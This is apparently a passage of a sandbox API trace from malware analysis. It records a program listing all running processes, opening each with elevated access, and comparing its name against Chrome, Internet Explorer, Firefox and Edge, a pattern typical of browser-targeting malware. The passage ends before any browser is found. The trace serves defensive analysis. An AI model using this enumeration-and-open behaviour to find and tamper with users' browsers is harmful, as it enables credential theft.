	[0248.011] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0248.015] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0248.017] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0248.018] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0248.019] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x9a70
	[0248.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.019] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0248.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.020] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.020] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0248.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.020] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.021] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0248.022] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x9a74
	[0248.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.022] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0248.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.022] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.023] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0248.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.023] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.024] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0248.025] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x9a78
	[0248.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.025] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0248.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.026] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.026] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0248.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.027] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.027] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0248.028] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x9a7c
	[0248.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.028] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0248.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.028] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.028] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0248.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.029] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.029] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0248.030] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x9a80
	[0248.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.030] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0248.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.030] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.031] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0248.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.031] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.031] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0248.032] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x9a84
	[0248.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.032] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0248.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.033] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.033] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0248.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.033] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.034] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0248.035] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x9a88
	[0248.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.035] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0248.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.035] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.035] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0248.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.036] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.036] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0248.036] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x9a8c
	[0248.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.037] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0248.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.037] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.037] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0248.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.037] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.038] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.038] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x9a90
	[0248.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.039] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.039] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.039] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.040] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.040] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.041] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x9a94
	[0248.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.041] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.041] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.042] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.042] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.042] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.043] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x9a98
	[0248.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.043] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.044] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.044] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.044] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.045] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.045] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x9a9c
	[0248.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.046] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.046] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.046] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.047] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.047] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.048] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x9aa0
	[0248.048] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.048] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.048] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.048] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.048] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.049] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.049] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.049] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.050] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x9aa4
	[0248.050] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.050] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.050] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.050] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.051] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.051] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.051] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.052] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x9aa8
	[0248.052] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.052] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.053] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.053] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.053] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.053] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0248.054] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x9aac
	[0248.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.054] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0248.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.055] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.055] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0248.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.055] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.056] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.060] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x9ab0
	[0248.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.060] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.060] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.061] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.061] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.061] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.061] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.061] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0248.062] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x9ab4
	[0248.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.062] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.062] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.063] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.063] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.063] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0248.064] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x9ab8
	[0248.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.064] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0248.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.065] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.065] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0248.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.065] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.066] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.066] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x9abc
	[0248.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.067] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.067] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.067] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.067] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.068] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0248.068] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x9ac0
	[0248.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.069] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0248.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.069] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.069] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0248.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.070] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.070] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0248.071] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x9ac4
	[0248.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.071] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0248.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.071] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.071] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0248.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.073] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.073] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0248.074] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x9ac8
	[0248.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.074] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0248.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.074] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.074] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.074] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0248.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.075] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.075] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0248.076] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x9acc
	[0248.076] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.076] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0248.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.120] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.120] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0248.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.120] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
